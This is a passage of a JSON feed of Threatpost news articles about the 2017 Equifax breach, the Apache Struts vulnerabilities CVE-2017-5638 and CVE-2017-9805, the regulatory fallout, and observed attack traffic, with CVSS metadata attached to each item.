[additional](<https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/>) 2.5 million customers were also impacted on top of the 143 million the company initially said were affected.\n\nMeanwhile, in February, documents submitted by Equifax to the US Senate Banking Committee revealed that attackers also accessed taxpayers identification numbers, email addresses, and credit card expiration dates for certain customers.\n\n**Renewed Anger**\n\nThis latest slew of impacted customers has renewed anger against the company, with some demanding stricter legislation for data protection \u2013 such as the proposed Data Breach Prevention and Compensation Act, which would impose strict security-related fines on credit reporting agencies.\n\n> My office is continuing our investigation of [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) so we can get to the bottom of how this disastrous data breach happened. \n> \n> We also need to change the law.\n> \n> \u2014 Eric Schneiderman (@AGSchneiderman) [March 1, 2018](<https://twitter.com/AGSchneiderman/status/969229077814108160?ref_src=twsrc%5Etfw>)\n\n> This is unacceptable. The California Department of Justice will continue to get to the bottom of this massive cybersecurity incident. We are committed to holding [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) accountable to the fullest extent of the law. <https://t.co/fRPrUWcIyg>\n> \n> \u2014 Xavier Becerra (@AGBecerra) [March 1, 2018](<https://twitter.com/AGBecerra/status/969330796774359040?ref_src=twsrc%5Etfw>)\n\nEquifax, meanwhile, continues to remain under investigation by several federal and state agencies, including a probe by the Consumer Financial Protection Bureau.\n\nCustomers can see if their personal information has been breached by clicking on an \u201cAm I Impacted\u201d tool on Equifax\u2019s [website](<https://www.equifaxsecurity2017.com/>). The company also advised consumers to visit its web portal where they can review their account statements and credit reports, identify any unauthorized activity, and protect their personal information from attack.\n\nThe company handles data on more than 820 million customers and 91 million businesses worldwide.\n", "cvss3": {}, "published": "2018-03-02T15:12:57", "type": "threatpost", "title": "Equifax Says 2.4 Million More People Impacted By Massive 2017 Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-02T15:12:57", "id": "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "href": "https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:58", "description": "Malicious traffic stemming from exploits against the [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) disclosed and [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) this week has tapered off since Wednesday.\n\nResearchers at Rapid7 published an [analysis](<https://community.rapid7.com/community/infosec/blog/2017/03/09/apache-jakarta-vulnerability-attacks-in-the-wild>) of data collected from its honeypots situated on five major cloud providers and a number of private networks that shows a couple of dozen sources have targeted this vulnerability, but only two, originating in China, have actually sent malicious commands.\n\nCisco Talos said on Thursday that attacks had [risen sharply](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) since word leaked of publicly available exploits and a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>). But it conceded that it was difficult to ascertain whether probes for vulnerable Apache servers could be carried out benignly.\n\nRapid7 said that in a 72-hour period starting Tuesday, a handful of events cropped up peaking at fewer than 50 between 11 a.m. and 6 p.m. Wednesday.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06230023/pastedImage_1.png>)\n\n\u201cWe are really seeing limited attempts to exploit the vulnerability,\u201d said Tom Sellers, threat analyst and security researcher at Rapid7. \u201cFor context, please keep in mind that our data is from honeypots hosted in cloud providers and may not reflect what other sensors and organizations are seeing.\u201d\n\nCraig Williams, Cisco Talos senior technical lead, said researchers there are seeing attack traffic trending downward as well.\n\n\u201cEarly indicators and past experiences were pointing to this being an ongoing issue with attackers continuing to seek out vulnerable machines. Interestingly, over the last couple days, we have seen a slowing of activity,\u201d Williams said. \u201cBecause this is so unusual, we are continuing to monitor the situation in case the trend starts moving in the other direction. Again, this is not typical for this type of issue but great news all the same.\u201d\n\nThe vulnerability is in the Jakarta Multipart parser that comes with Apache. An attacker can trivially exploit the vulnerability to gain remote code execution by sending a HTTP request that contains a crafted Content-Type value. The vulnerable software will throw an exception in such cases.\n\n\u201cWhen the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed,\u201d Sellers wrote in an analysis published yesterday.\n\nThe vulnerability was disclosed and patched on Monday, and by Tuesday, Rapid7 was seeing two malicious requests from a host geo-located in Zhengzhou, China. The attacks arrived in HTTP GET requests and issued commands to the vulnerable webserver for it to download binaries from the attacker-controlled server on the internet. Sellers called it a standard command-injection attack against a webserver where the attacker is able to write code that instructs the server to reach out to an IP address and download code that executes on the server.\n\nThe second attack was spotted Wednesday when a host in Shanghai, China sent HTTP POST requests to servers instructing them to disable their firewall and grab code related to the XOR DDoS malware family.\n\n\u201cWhile we\u2019ve seen a couple dozen sources exploiting the vulnerability, only those two issued malicious commands,\u201d Sellers said. \u201cWe\u2019ve actually seen a drop off in related traffic since Wednesday. The most active attacker stopped on Thursday around 4 a.m. U.S. Central time.\u201d\n\nSellers said it\u2019s unclear as to why there\u2019s been a dropoff in malicious traffic.\n\n\u201cIt could be caused by a number of factors. The malicious payload is pretty obvious and easy to filter if traffic is inspected,\u201d Sellers said. \u201cAttackers might be prioritizing other vulnerabilities such as the ones announced in cameras recently. The lull may be temporary and we may see activity rise again after attention moves on to efforts.\u201d\n\nCisco raised the issue of IoT devices running the vulnerable Apache software as well, which could be an indicator of initial interest from DDoS bots.\n\n\u201cGiven the low sample size it\u2019s difficult for me to say.It\u2019s possible that DDoS bots are the early adopters since infection would generate easy, repeatable income and the code was trivial to port to existing frameworks,\u201d Sellers said. \u201cCompare that to ransomware, where a new deployment mechanism may need to be written but would likely only result in a single payout per host.\u201d\n\nResearchers were also seeing a number of requests probing for additional vulnerable servers that included whoami and ifconfig, commands that are relatively benign but could return information about what context the server is running in. Servers running at root\u2014an uncommon practice\u2014are most at risk.\n", "cvss3": {}, "published": "2017-03-10T10:51:01", "type": "threatpost", "title": "Apache Attack Traffic Dropping, Limited to Few Sources", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T16:12:17", "id": "THREATPOST:AACAA4F654495529E053D43901F00A81", "href": "https://threatpost.com/apache-attack-traffic-dropping-limited-to-few-sources/124227/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:31", "description": "Equifax, the credit agency behind this summer\u2019s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.\n\nPaulino do Rego Barros, Jr., the company\u2019s interim CEO, [announced Monday](<https://www.equifaxsecurity2017.com/>) that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.\n\nEquifax initially called its investigation around the breach \u201csubstantially complete,\u201d but said it was still carrying out further analysis with Mandiant, a FireEye company it hired to investigate the breach, on the incident. According to Equifax, investigators didn\u2019t find any additional vulnerabilities. The extra 2.5 million Americans figure came \u201cduring Mandiant\u2019s completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\u201d\n\nThe company used the opportunity on Monday to reiterate that Canadian citizens were also impacted, although far fewer than initially thought. The company said there may have been up to 100,000 Canadians affected several weeks ago however upon closer inspection, only 8,000 Canadian consumers were affected by the breach.\n\nEquifax says its still analyzing exactly how many United Kingdom consumers have been affected by the breach and is in the middle discussions with regulators to determine how to notify them.\n\nDetails about the breach came out the day before Richard Smith, Equifax\u2019s former CEO, was scheduled to testify about the breach before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection. Smith, former Equifax chairman and chief executive, [retired last Tuesday](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>) in wake of the breach.\n\nIn a [written testimony (.PDF)](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) released in tandem with the subcommittee hearing, Smith blamed the breach on a combination of \u201chuman error and technology failures.\u201d\n\n\u201cThese mistakes \u2013 made in the same chain of security systems designed with redundancies \u2013 allowed criminals to access over 140 million Americans\u2019 data,\u201d Smith wrote.\n\nIn the testimony Smith claimed that the U.S. Department of Homeland Security\u2019s Computer Emergency Readiness Team (U.S. CERT) notified Equifax on March 8 that [it needed to patch CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), the Apache Struts vulnerability that eventually led to the hack.\n\nEquifax requested the \u201capplicable personnel responsible\u201d update Apache Struts via email on March 9, something that should have been done within a 48 hour period, Smith said.\n\nThat was never done and according to Smith, the vulnerability wasn\u2019t picked up by internal scans designed to identify vulnerable systems carried out on March 15. The issue lingered for roughly two months until attackers accessed Equifax\u2019s systems on May 13 \u2013 and persisted until the company became aware of the attackers on July 30.\n\nGreg Walden (R-Ore.) pointed out some of Equifax\u2019s many missteps on Tuesday morning, including how Equifax\u2019s consumer facing website for the breach was put hosted on a separate domain from the main Equifax website, the confusion that spawned, and how on multiple occasions Equifax directed users to the wrong website.\n\n\u201cOn top of all the other issues, multiple times Equifax tweeted the wrong URL directing consumers to the wrong website to check if they were part of a breach,\u201d Walden said, \u201cTalk about ham-handed responses this is simply unacceptable and it makes me wonder if there was a breach response plan in place at all and if anyone was in charge of executing that plan.\u201d\n\nDuring another part of the hearing, Tim Murphy, a U.S. representative for Pennsylvania\u2019s 18th Congressional district, came back to that question. When told the company\u2019s original site couldn\u2019t handle the traffic is received, Murphy was befuddled.\n\n\u201cWhy wouldn\u2019t your website be able to handle this kind of traffic?\u201d Murphy asked, \u201cIt just doesn\u2019t make sense, a company your size and with your knowledge, doesn\u2019t understand how to handle traffic for over 100 million people, don\u2019t you use an Elastic cloud computing service that would\u2019ve accounted for this?\u201d\n\nSmith said the sheer amount of traffic Equifax\u2019s site received in wake of the breach made hosting a site on its domain impossible.\n\n\u201cThe environment the micro site is in is a cloud environment that\u2019s very, very scalable,\u201d Smith said. \u201cOur traditional environment could not handle 400 million consumer visits for three weeks.\u201d\n\nMurphy also grilled Smith on what took Equifax so long to patch the March vulnerability and if it\u2019s possible Equifax\u2019s internal scanning system could potentially miss another vulnerability.\n\n\u201cIf the patch only took a few days to apply why did Equifax fail to apply it in March when it was announced as critical?\u201d Murphy asked.\n\nSmith skirted the question and instead discussed the difficulties associated with patching.\n\n\u201cPatching can take a variety of time\u2026 it can take days or up to a week or more,\u201d Smith said, adding that he wasn\u2019t aware of the particular Struts vulnerability at the time.\n\nAt the end of the hearing, when pressed by Anna Eshoo, U.S. Representative for California\u2019s 18th congressional district, Smith described the process around patching again but did little to deviate from his prepared testimony.\n\n\u201cI want to know when they did it, when they took care of [the patch]\u201d Eshoo said.\n\n\u201cThey took care of it in July because we never found it,\u201d Smith said. \u201cWe had the human error, we did the scan, the technology never found it, in July we found suspicious activity, took the portal down, found the vulnerability, applied the patch.\u201d\n", "cvss3": {}, "published": "2017-10-03T15:27:08", "type": "threatpost", "title": "Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T15:27:08", "id": "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "href": "https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-11T11:42:25", "description": "Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.\n\nThe consumer credit reporting agency on Monday [said](<https://investor.equifax.com/news-and-events/news/2019/07-22-2019-125543228>) it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB). If the initial amount does not cover consumer losses, the company may need to pay an additional $125 million.\n\n\u201cCompanies that profit from personal information have an extra responsibility to protect and secure that data,\u201d said Federal Trade Commission (FTC) Chairman Joe Simons [in a statement](<https://www.ftc.gov/news-events/press-releases/2019/07/equifax-pay-575-million-part-settlement-ftc-cfpb-states-related?utm_source=slider>). \u201cEquifax failed to take basic steps that may have prevented the breach that affected approximately 147 million consumers. This settlement requires that the company take steps to improve its data security going forward, and will ensure that consumers harmed by this breach can receive help protecting themselves from identity theft and fraud.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nEquifax, which handles data associated with more than 820 million customers and 91 million businesses worldwide, has been under public scrutiny since September 2017 when [it disclosed](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) a data breach that impacted almost 150 million Americans. The attackers managed to [access information](<https://threatpost.com/equifax-data-nation-state/141929/>) containing Social Security numbers, birth dates, addresses, and some driver\u2019s license numbers. Equifax said it discovered the intrusion on July 29, meaning attackers apparently had access to the company\u2019s files for nearly 12 weeks.\n\nAfter the data breach, Equifax was hit by multiple lawsuits, as well as investigations by the FTC, the CFPB, the Attorneys General of 48 states, and more.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/22101929/eqfx-socmed-summary.png>)\n\nLawsuits claimed that Equifax failed to patch its network in March 2017 after being alerted of a [critical security flaw](<https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/>) (an Apache Struts vulnerability, CVE-2017-5638) in its Equifax Automated Consumer Interview System database (which handles inquiries from consumers about their personal credit data). This vulnerability was ultimately exploited by bad actors, leading to the data breach.\n\nAs part of the agreement, Equifax also said it will take steps to enhance its information security and technology program, as well as make payments totaling $290.5 million to state and federal regulatory agencies to pay attorneys\u2019 fees and costs in the multi-district litigation.\n\nIn the past month, a slew of fines and penalties have been imposed that were tied privacy and data breach incidents. Earlier in July, the [FTC slapped](<https://threatpost.com/privacy-experts-facebooks-5b-fine/146478/>) a $5 billion fine on Facebook for privacy violations following its Cambridge Analytica incident. Also hit with security-related fines in July were [Marriott](<https://threatpost.com/marriott-123m-fine-data-breach/146320/>) ($123 million) and [British Airways](<https://threatpost.com/post-data-breach-british-airways-slapped-with-record-230m-fine/146272/>) ($230 million).\n\nWhile opinions are mixed about the appropriate penalty for these companies and Equifax, security experts for their part hope that other companies will take note of the fines when it comes to data security and privacy.\n\n\u201cI\u2019m far from an Equifax apologist, but the truth is it could have been anyone,\u201d Adam Laub, chief marketing officer at STEALTHbits Technologies said in an email. \u201cIt\u2019s not an excuse, but rather the reality we live in. The best outcome isn\u2019t Equifax making the situation right \u2013 although that is important for all of those affected \u2013 it\u2019s everyone else learning that the price to be paid outweighs the inconvenience of ensuring proper measures are taken to secure the data that puts them at risk in the first place. And it\u2019s got to be from the ground up too. There\u2019s no silver bullet.\u201d\n\n**_Interested in more on patch management? Don\u2019t miss our free live _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**_, \u201c_****_Streamlining Patch Management,\u201d on Wed., July 24, at 2:00 p.m. EDT. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. _****_[Register and Learn More](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)_**\n", "cvss3": {}, "published": "2019-07-22T14:31:39", "type": "threatpost", "title": "Equifax to Pay $700 Million in 2017 Data Breach Settlement", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-07-22T14:31:39", "id": "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "href": "https://threatpost.com/equifax-to-pay-700-million-in-2017-data-breach-settlement/146579/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:10", "description": "Equifax said the culprit behind [this summer\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) was indeed CVE-2017-5638, an Apache Struts vulnerability patched back in March.\n\nThe bug was widely assumed by experts to be the \u201cU.S. website application vulnerability\u201d implicated by the company last Thursday, especially after an Apache spokeswoman [told Reuters](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) on Friday that it appeared the consumer credit reporting agency hadn\u2019t applied patches for flaws discovered earlier this year.\n\nOn Wednesday company specified the flaw in a statement [posted to its site](<https://www.equifaxsecurity2017.com/>) and stressed it was continuing to work alongside law enforcement to investigate the incident.\n\n> \u201cEquifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.\u201d\n\nUntil the news broke on Wednesday there was still mounting confusion over which Struts vulnerability attackers used.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, [wrote in open letter over the weekend](<https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/>) that attackers either used an unknown Struts zero day or an earlier announced vulnerability. A separate remote code execution bug, CVE-2017-9805, was fixed in Struts [last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) but Gielen said the Apache PMC would have known about it if it was being exploited in July.\n\nAn internal report last week from equity research firm Baird said a Struts vulnerability was behind the breach as well. The analyst who penned the report failed to specify which vulnerability and neglected to state how he arrived at that conclusion however.\n\nJeff Williams, chief technology officer of Contrast Security, wrote last Saturday that CVE-2017-5638 was likely to blame for the breach.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Williams wrote, adding on Thursday that he was familiar with several large organizations which took months to fix the bug.\n\n\u201cThe process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out,\u201d Williams said.\n\nThe vulnerability, a flaw in the Jakarta Multipart parser upload function in Apache, allowed an attacker to make a maliciously crafted request to an Apache webserver. The vulnerability, which first surfaced on Chinese forums before it was discovered by researchers with Cisco Talos, [was patched back in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) but proof of concept exploit code quickly found its way into Metasploit. Public scans and attacks spiked immediately following disclosure of the vulnerability and at least one campaign was found [installing Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable servers.\n\nFamed cryptographer Bruce Schneier, CTO of IBM Resilient, [weighed in](<https://www.schneier.com/blog/archives/2017/09/on_the_equifax_.html>) on the Equifax fiasco on Wednesday and like IoT issues as of late [have necessitated](<https://threatpost.com/legislation-proposed-to-secure-connected-iot-devices/127152/>), suggested the only solution to preventing breaches like this from happening again is government intervention.\n\n\u201cBy regulating the security practices of companies that store our data, and fining companies that fail to comply, governments can raise the cost of insecurity high enough that security becomes a cheaper alternative,\u201d Schneier wrote, \u201cThey can do the same thing by giving individuals affected by these breaches the ability to sue successfully, citing the exposure of personal data itself as a harm.\u201d\n\nFittingly, as if to get the ball rolling, on Wednesday U.S. Sen. Mark Warner (D-VA) asked the Federal Trade Commission to look into the breach and the company\u2019s security practices, namely whether Equifax has adequate cybersecurity safeguards in place for the amount of personally identifiable information it deals with.\n\n\u201cThe volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,\u201d [Warner wrote](<https://www.scribd.com/document/358810691/Sen-Warner-Asks-FTC-to-Probe-Equifax>), \u201cIn ways similar to the financial service industry\u2019s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.\u201d\n\nThe letter came a few days after members of the U.S. Senate Finance Committee, including Sen. Orrin Hatch (R-UT) and Ron Wyden (D-Ore.) sent another letter to Equifax CEO Richard Smith asking for additional information about the breach.\n\n\u201cThe scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers,\u201d the senators wrote in a [letter](<https://www.finance.senate.gov/download/91117-equifax-release>) on Monday.\n\nWhile the FTC doesn\u2019t typically comment on ongoing investigations the Commission did confirm Thursday afternoon because of the \u201cintense public interest\u201d and \u201cpotential impact of this matter,\u201d it was looking into the breach.\n\nEquifax said Americans and an undisclosed number of Canadian and United Kingdom residents were affected by the breach but security news site [KrebsonSecurity.com](<https://krebsonsecurity.com/2017/09/ayuda-help-equifax-has-my-data/>) said this week Argentinans may be implicated as well. Brian Krebs, who authors the site, claims he was contacted by Alex Holden, who runs the firm Hold Security, earlier this week. Two of Holden\u2019s employees, native Argentinans, discovered an Equifax portal for employees in Argentina that included their names, email addresses, and DNI \u2013 the Argentinian equivalent of a Social Security Number.\n\nThe site, according to Holden \u201cwas wide open, protected by perhaps the most easy-to-guess password combination ever: \u201cadmin/admin.\u201d Krebs claims the portal was disabled upon notifying Equifax\u2019s attorney and that the company is looking into how it may have been left unsecured.\n", "cvss3": {}, "published": "2017-09-14T16:00:34", "type": "threatpost", "title": "Equifax Confirms March Struts Vulnerability Behind Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-15T13:01:13", "id": "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "href": "https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the processes of taking structured data from one format and rebuilding it into an object. The processes can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird &amp; Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams 